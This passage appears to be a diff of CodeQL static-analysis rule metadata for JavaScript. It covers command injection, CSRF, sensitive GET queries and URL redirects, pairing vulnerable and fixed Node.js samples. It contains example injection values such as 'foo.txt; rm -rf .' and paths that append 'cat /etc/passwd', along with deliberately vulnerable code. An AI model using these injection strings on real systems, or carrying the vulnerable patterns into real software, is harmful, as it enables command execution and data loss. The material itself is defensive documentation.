that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, use hard-coded string literals to specify the shell command to run, and provide the dynamic arguments to the shell command separately to avoid interpretation by the shell.\n\nAlternatively, if the shell command must be constructed dynamically, then add code to ensure that special characters in environment values do not alter the shell command unexpectedly.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that recursively removes a temporary directory that is located next to the currently executing JavaScript file. Such utilities are often found in custom build scripts.\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm -rf \" + path.join(__dirname, \"temp\");\n cp.execSync(cmd); // BAD\n}\n\n```\nThe shell command will, however, fail to work as intended if the absolute path of the script's directory contains spaces. In that case, the shell command will interpret the absolute path as multiple paths, instead of a single path.\n\nFor instance, if the absolute path of the temporary directory is `/home/username/important project/temp`, then the shell command will recursively delete `/home/username/important` and `project/temp`, where the latter path gets resolved relative to the working directory of the JavaScript process.\n\nEven worse, although less likely, a malicious user could provide the path `/home/username/; cat /etc/passwd #/important project/temp` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the directory as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm\",\n args = [\"-rf\", path.join(__dirname, \"temp\")];\n cp.execFileSync(cmd, args); // GOOD\n}\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], - "description" : "Building a shell command string with values from the enclosing\n environment may cause subtle bugs or vulnerabilities.", - "id" : "js/shell-command-injection-from-environment", - "kind" : "path-problem", - "name" : "Shell command built from environment values", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.3" - } - }, { - "id" : "js/second-order-command-line-injection", - "name" : "js/second-order-command-line-injection", - "shortDescription" : { - "text" : "Second order command injection" - }, - "fullDescription" : { - "text" : "Using user-controlled data as arguments to some commands, such as git clone, can allow arbitrary commands to be executed." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Second order command injection\nSome shell commands, like `git ls-remote`, can execute arbitrary commands if a user provides a malicious URL that starts with `--upload-pack`. This can be used to execute arbitrary code on the server.\n\n\n## Recommendation\nSanitize user input before passing it to the shell command. For example, ensure that URLs are valid and do not contain malicious commands.\n\n\n## Example\nThe following example shows code that executes `git ls-remote` on a URL that can be controlled by a malicious user.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n cp.execFile(\"git\", [\"ls-remote\", remote]); // NOT OK\n});\n\n```\nThe problem has been fixed in the snippet below, where the URL is validated before being passed to the shell command.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n if (!(remote.startsWith(\"git@\") || remote.startsWith(\"https://\"))) {\n throw new Error(\"Invalid remote: \" + remote);\n }\n cp.execFile(\"git\", [\"ls-remote\", remote]); // OK\n});\n\n```\n\n## References\n* Max Justicz: [Hacking 3,000,000 apps at once through CocoaPods](https://justi.cz/security/2021/04/20/cocoapods-rce.html).\n* Git: [Git - git-ls-remote Documentation](https://git-scm.com/docs/git-ls-remote/2.22.0#Documentation/git-ls-remote.txt---upload-packltexecgt).\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", - "markdown" : "# Second order command injection\nSome shell commands, like `git ls-remote`, can execute arbitrary commands if a user provides a malicious URL that starts with `--upload-pack`. This can be used to execute arbitrary code on the server.\n\n\n## Recommendation\nSanitize user input before passing it to the shell command. For example, ensure that URLs are valid and do not contain malicious commands.\n\n\n## Example\nThe following example shows code that executes `git ls-remote` on a URL that can be controlled by a malicious user.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n cp.execFile(\"git\", [\"ls-remote\", remote]); // NOT OK\n});\n\n```\nThe problem has been fixed in the snippet below, where the URL is validated before being passed to the shell command.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n if (!(remote.startsWith(\"git@\") || remote.startsWith(\"https://\"))) {\n throw new Error(\"Invalid remote: \" + remote);\n }\n cp.execFile(\"git\", [\"ls-remote\", remote]); // OK\n});\n\n```\n\n## References\n* Max Justicz: [Hacking 3,000,000 apps at once through CocoaPods](https://justi.cz/security/2021/04/20/cocoapods-rce.html).\n* Git: [Git - git-ls-remote Documentation](https://git-scm.com/docs/git-ls-remote/2.22.0#Documentation/git-ls-remote.txt---upload-packltexecgt).\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], - "description" : "Using user-controlled data as arguments to some commands, such as git clone,\n can allow arbitrary commands to be executed.", - "id" : "js/second-order-command-line-injection", - "kind" : "path-problem", - "name" : "Second order command injection", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.0" - } - }, { - "id" : "js/command-line-injection", - "name" : "js/command-line-injection", - "shortDescription" : { - "text" : "Uncontrolled command line" - }, - "fullDescription" : { - "text" : "Using externally controlled strings in a command line may allow a malicious user to change the meaning of the command." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Uncontrolled command line\nCode that passes untrusted user input directly to `child_process.exec` or similar APIs that execute shell commands allows the user to execute malicious code.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and that accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that the user input string is safe before using it.\n\n\n## Example\nThe following example shows code that extracts a filename from an HTTP query parameter that may contain untrusted data, and then embeds it into a shell command to count its lines without examining it first:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execSync(`wc -l ${file}`); // BAD\n});\n\n```\nA malicious user can take advantage of this code by executing arbitrary shell commands. For example, by providing a filename like `foo.txt; rm -rf .`, the user can first count the lines in `foo.txt` and subsequently delete all files in the current directory.\n\nTo avoid this catastrophic behavior, use an API such as `child_process.execFileSync` that does not spawn a shell by default:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execFileSync('wc', ['-l', file]); // GOOD\n});\n\n```\nIf you want to allow the user to specify other options to `wc`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url'),\n shellQuote = require('shell-quote');\n\nvar server = http.createServer(function(req, res) {\n let options = url.parse(req.url, true).query.options;\n\n cp.execFileSync('wc', shellQuote.parse(options)); // GOOD\n});\n\n```\nAlternatively, the original example can be made safe by checking the filename against an allowlist of safe characters before using it:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n // only allow safe characters in file name\n if (file.match(/^[\\w\\.\\-\\/]+$/)) {\n cp.execSync(`wc -l ${file}`); // GOOD\n }\n});\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", - "markdown" : "# Uncontrolled command line\nCode that passes untrusted user input directly to `child_process.exec` or similar APIs that execute shell commands allows the user to execute malicious code.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and that accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that the user input string is safe before using it.\n\n\n## Example\nThe following example shows code that extracts a filename from an HTTP query parameter that may contain untrusted data, and then embeds it into a shell command to count its lines without examining it first:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execSync(`wc -l ${file}`); // BAD\n});\n\n```\nA malicious user can take advantage of this code by executing arbitrary shell commands. For example, by providing a filename like `foo.txt; rm -rf .`, the user can first count the lines in `foo.txt` and subsequently delete all files in the current directory.\n\nTo avoid this catastrophic behavior, use an API such as `child_process.execFileSync` that does not spawn a shell by default:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execFileSync('wc', ['-l', file]); // GOOD\n});\n\n```\nIf you want to allow the user to specify other options to `wc`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url'),\n shellQuote = require('shell-quote');\n\nvar server = http.createServer(function(req, res) {\n let options = url.parse(req.url, true).query.options;\n\n cp.execFileSync('wc', shellQuote.parse(options)); // GOOD\n});\n\n```\nAlternatively, the original example can be made safe by checking the filename against an allowlist of safe characters before using it:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n // only allow safe characters in file name\n if (file.match(/^[\\w\\.\\-\\/]+$/)) {\n cp.execSync(`wc -l ${file}`); // GOOD\n }\n});\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], - "description" : "Using externally controlled strings in a command line may allow a malicious\n user to change the meaning of the command.", - "id" : "js/command-line-injection", - "kind" : "path-problem", - "name" : "Uncontrolled command line", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "9.8" - } - }, { - "id" : "js/unnecessary-use-of-cat", - "name" : "js/unnecessary-use-of-cat", - "shortDescription" : { - "text" : "Unnecessary use of `cat` process" - }, - "fullDescription" : { - "text" : "Using the `cat` process to read a file is unnecessarily complex, inefficient, unportable, and can lead to subtle bugs, or even security vulnerabilities." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Unnecessary use of `cat` process\nUsing the unix command `cat` only to read a file is an unnecessarily complex way to achieve something that can be done in a simpler and safer manner using the Node.js `fs.readFile` API.\n\nThe use of `cat` for simple file reads leads to code that is unportable, inefficient, complex, and can lead to subtle bugs or even security vulnerabilities.\n\n\n## Recommendation\nUse `fs.readFile` or `fs.readFileSync` to read files from the file system.\n\n\n## Example\nThe following example shows code that reads a file using `cat`:\n\n\n```javascript\nvar child_process = require('child_process');\n\nmodule.exports = function (name) {\n return child_process.execSync(\"cat \" + name).toString();\n};\n\n```\nThe code in the example will break if the input `name` contains special characters (including space). Additionally, it does not work on Windows and if the input is user-controlled, a command injection attack can happen.\n\nThe `fs.readFile` API should be used to avoid these potential issues:\n\n\n```javascript\nvar fs = require('fs');\n\nmodule.exports = function (name) {\n return fs.readFileSync(name).toString();\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Node.js: [File System API](https://nodejs.org/api/fs.html).\n* [The Useless Use of Cat Award](http://porkmail.org/era/unix/award.html#cat).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n", - "markdown" : "# Unnecessary use of `cat` process\nUsing the unix command `cat` only to read a file is an unnecessarily complex way to achieve something that can be done in a simpler and safer manner using the Node.js `fs.readFile` API.\n\nThe use of `cat` for simple file reads leads to code that is unportable, inefficient, complex, and can lead to subtle bugs or even security vulnerabilities.\n\n\n## Recommendation\nUse `fs.readFile` or `fs.readFileSync` to read files from the file system.\n\n\n## Example\nThe following example shows code that reads a file using `cat`:\n\n\n```javascript\nvar child_process = require('child_process');\n\nmodule.exports = function (name) {\n return child_process.execSync(\"cat \" + name).toString();\n};\n\n```\nThe code in the example will break if the input `name` contains special characters (including space). Additionally, it does not work on Windows and if the input is user-controlled, a command injection attack can happen.\n\nThe `fs.readFile` API should be used to avoid these potential issues:\n\n\n```javascript\nvar fs = require('fs');\n\nmodule.exports = function (name) {\n return fs.readFileSync(name).toString();\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Node.js: [File System API](https://nodejs.org/api/fs.html).\n* [The Useless Use of Cat Award](http://porkmail.org/era/unix/award.html#cat).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "maintainability", "external/cwe/cwe-078" ], - "description" : "Using the `cat` process to read a file is unnecessarily complex, inefficient, unportable, and can lead to subtle bugs, or even security vulnerabilities.", - "id" : "js/unnecessary-use-of-cat", - "kind" : "problem", - "name" : "Unnecessary use of `cat` process", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.3" - } - }, { - "id" : "js/shell-command-constructed-from-input", - "name" : "js/shell-command-constructed-from-input", - "shortDescription" : { - "text" : "Unsafe shell command constructed from library input" - }, - "fullDescription" : { - "text" : "Using externally controlled strings in a command line may allow a malicious user to change the meaning of the command." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Unsafe shell command constructed from library input\nDynamically constructing a shell command with inputs from exported functions may inadvertently change the meaning of the shell command. Clients using the exported function may use inputs containing characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, provide the dynamic arguments to the shell as an array using a safe API such as `child_process.execFile` to avoid interpretation by the shell.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nAlternatively, if the command must be interpreted by a shell (for example because it includes I/O redirections), you can use `shell-quote` to escape any special characters in the input before embedding it in the command.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that downloads a file from a remote URL.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path, callback);\n}\n\n```\nThe shell command will, however, fail to work as intended if the input contains spaces or other special characters interpreted in a special way by the shell.\n\nEven worse, a client might pass in user-controlled data, not knowing that the input is interpreted as a shell command. This could allow a malicious user to provide the input `http://example.org; cat /etc/passwd` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the inputs from exported functions as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.execFile(\"wget\", [path], callback);\n}\n\n```\nAs another example, consider the following code which is similar to the preceding example, but pipes the output of `wget` into `wc -l` to count the number of lines in the downloaded file.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path + \" | wc -l\", callback);\n};\n\n```\nIn this case, using `child_process.execFile` is not an option because the shell is needed to interpret the pipe operator. Instead, you can use `shell-quote` to escape the input before embedding it in the command:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + shellQuote.quote([path]) + \" | wc -l\", callback);\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", - "markdown" : "# Unsafe shell command constructed from library input\nDynamically constructing a shell command with inputs from exported functions may inadvertently change the meaning of the shell command. Clients using the exported function may use inputs containing characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, provide the dynamic arguments to the shell as an array using a safe API such as `child_process.execFile` to avoid interpretation by the shell.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nAlternatively, if the command must be interpreted by a shell (for example because it includes I/O redirections), you can use `shell-quote` to escape any special characters in the input before embedding it in the command.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that downloads a file from a remote URL.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path, callback);\n}\n\n```\nThe shell command will, however, fail to work as intended if the input contains spaces or other special characters interpreted in a special way by the shell.\n\nEven worse, a client might pass in user-controlled data, not knowing that the input is interpreted as a shell command. This could allow a malicious user to provide the input `http://example.org; cat /etc/passwd` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the inputs from exported functions as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.execFile(\"wget\", [path], callback);\n}\n\n```\nAs another example, consider the following code which is similar to the preceding example, but pipes the output of `wget` into `wc -l` to count the number of lines in the downloaded file.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path + \" | wc -l\", callback);\n};\n\n```\nIn this case, using `child_process.execFile` is not an option because the shell is needed to interpret the pipe operator. Instead, you can use `shell-quote` to escape the input before embedding it in the command:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + shellQuote.quote([path]) + \" | wc -l\", callback);\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], - "description" : "Using externally controlled strings in a command line may allow a malicious\n user to change the meaning of the command.", - "id" : "js/shell-command-constructed-from-input", - "kind" : "path-problem", - "name" : "Unsafe shell command constructed from library input", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.3" - } - }, { - "id" : "js/sensitive-get-query", - "name" : "js/sensitive-get-query", - "shortDescription" : { - "text" : "Sensitive data read from GET request" - }, - "fullDescription" : { - "text" : "Placing sensitive data in a GET request increases the risk of the data being exposed to an attacker." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Sensitive data read from GET request\nSensitive information such as user passwords should not be transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing sensitive information into the URL therefore increases the risk that it will be captured by an attacker.\n\n\n## Recommendation\nUse HTTP POST to send sensitive information as part of the request body; for example, as form data.\n\n\n## Example\nThe following example shows two route handlers that both receive a username and a password. The first receives this sensitive information from the query parameters of a GET request, which is transmitted in the URL. The second receives this sensitive information from the request body of a POST request.\n\n\n```javascript\nconst express = require('express');\nconst app = express();\napp.use(require('body-parser').urlencoded({ extended: false }))\n\n// bad: sensitive information is read from query parameters\napp.get('/login1', (req, res) => {\n const user = req.query.user;\n const password = req.query.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n// good: sensitive information is read from post body\napp.post('/login2', (req, res) => {\n const user = req.body.user;\n const password = req.body.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n```\n\n## References\n* CWE: [CWE-598: Use of GET Request Method with Sensitive Query Strings](https://cwe.mitre.org/data/definitions/598.html)\n* PortSwigger (Burp): [Password Submitted using GET Method](https://portswigger.net/kb/issues/00400300_password-submitted-using-get-method)\n* OWASP: [Information Exposure through Query Strings in URL](https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url)\n* Common Weakness Enumeration: [CWE-598](https://cwe.mitre.org/data/definitions/598.html).\n", - "markdown" : "# Sensitive data read from GET request\nSensitive information such as user passwords should not be transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing sensitive information into the URL therefore increases the risk that it will be captured by an attacker.\n\n\n## Recommendation\nUse HTTP POST to send sensitive information as part of the request body; for example, as form data.\n\n\n## Example\nThe following example shows two route handlers that both receive a username and a password. The first receives this sensitive information from the query parameters of a GET request, which is transmitted in the URL. The second receives this sensitive information from the request body of a POST request.\n\n\n```javascript\nconst express = require('express');\nconst app = express();\napp.use(require('body-parser').urlencoded({ extended: false }))\n\n// bad: sensitive information is read from query parameters\napp.get('/login1', (req, res) => {\n const user = req.query.user;\n const password = req.query.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n// good: sensitive information is read from post body\napp.post('/login2', (req, res) => {\n const user = req.body.user;\n const password = req.body.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n```\n\n## References\n* CWE: [CWE-598: Use of GET Request Method with Sensitive Query Strings](https://cwe.mitre.org/data/definitions/598.html)\n* PortSwigger (Burp): [Password Submitted using GET Method](https://portswigger.net/kb/issues/00400300_password-submitted-using-get-method)\n* OWASP: [Information Exposure through Query Strings in URL](https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url)\n* Common Weakness Enumeration: [CWE-598](https://cwe.mitre.org/data/definitions/598.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-598" ], - "description" : "Placing sensitive data in a GET request increases the risk of\n the data being exposed to an attacker.", - "id" : "js/sensitive-get-query", - "kind" : "problem", - "name" : "Sensitive data read from GET request", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.5" - } - }, { - "id" : "js/missing-token-validation", - "name" : "js/missing-token-validation", - "shortDescription" : { - "text" : "Missing CSRF middleware" - }, - "fullDescription" : { - "text" : "Using cookies without CSRF protection may allow malicious websites to submit requests on behalf of the user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Missing CSRF middleware\nWebsites that rely on cookie-based authentication may be vulnerable to cross-site request forgery (CSRF). Specifically, a state-changing request should include a secret token so the request can't be forged by an attacker. Otherwise, unwanted requests can be submitted on behalf of a user who visits a malicious website.\n\nThis is typically mitigated by embedding a session-specific secret token in each request. This token is then checked as an additional authentication measure. A malicious website should have no way of guessing the correct token to embed in the request.\n\n\n## Recommendation\nUse a middleware package such as `lusca.csrf` to protect against CSRF attacks.\n\n\n## Example\nIn the example below, the server authenticates users before performing the `changeEmail` POST action:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\");\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... update email associated with userId\n});\n\n```\nThis is not secure. An attacker can submit a POST `changeEmail` request on behalf of a user who visited a malicious website. Since authentication happens without any action from the user, the `changeEmail` action would be executed, despite not being initiated by the user.\n\nThis vulnerability can be mitigated by installing a CSRF protecting middleware handler:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\"),\n csrf = require('lusca').csrf;\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\napp.use(csrf());\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... update email associated with userId\n});\n\n```\n\n## References\n* OWASP: [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))\n* NPM: [lusca](https://www.npmjs.com/package/lusca)\n* Common Weakness Enumeration: [CWE-352](https://cwe.mitre.org/data/definitions/352.html).\n", - "markdown" : "# Missing CSRF middleware\nWebsites that rely on cookie-based authentication may be vulnerable to cross-site request forgery (CSRF). Specifically, a state-changing request should include a secret token so the request can't be forged by an attacker. Otherwise, unwanted requests can be submitted on behalf of a user who visits a malicious website.\n\nThis is typically mitigated by embedding a session-specific secret token in each request. This token is then checked as an additional authentication measure. A malicious website should have no way of guessing the correct token to embed in the request.\n\n\n## Recommendation\nUse a middleware package such as `lusca.csrf` to protect against CSRF attacks.\n\n\n## Example\nIn the example below, the server authenticates users before performing the `changeEmail` POST action:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\");\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... update email associated with userId\n});\n\n```\nThis is not secure. An attacker can submit a POST `changeEmail` request on behalf of a user who visited a malicious website. Since authentication happens without any action from the user, the `changeEmail` action would be executed, despite not being initiated by the user.\n\nThis vulnerability can be mitigated by installing a CSRF protecting middleware handler:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\"),\n csrf = require('lusca').csrf;\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\napp.use(csrf());\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... update email associated with userId\n});\n\n```\n\n## References\n* OWASP: [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))\n* NPM: [lusca](https://www.npmjs.com/package/lusca)\n* Common Weakness Enumeration: [CWE-352](https://cwe.mitre.org/data/definitions/352.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-352" ], - "description" : "Using cookies without CSRF protection may allow malicious websites to\n submit requests on behalf of the user.", - "id" : "js/missing-token-validation", - "kind" : "problem", - "name" : "Missing CSRF middleware", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "8.8" - } - }, { - "id" : "js/server-side-unvalidated-url-redirection", - "name" : "js/server-side-unvalidated-url-redirection", - "shortDescription" : { - "text" : "Server-side URL redirect" - }, - "fullDescription" : { - "text" : "Server-side URL redirection based on unvalidated user input may cause redirection to malicious web sites." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Server-side URL redirect\nDirectly incorporating user input into a URL redirect request without validating the input can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\nIf this is not possible, then the user input should be validated in some other way, for example, by verifying that the target URL is on the same host as the current page.\n\n\n## Example\nThe following example shows an HTTP request parameter being used directly in a URL redirect without validating the input, which facilitates phishing attacks:\n\n\n```javascript\nconst app = 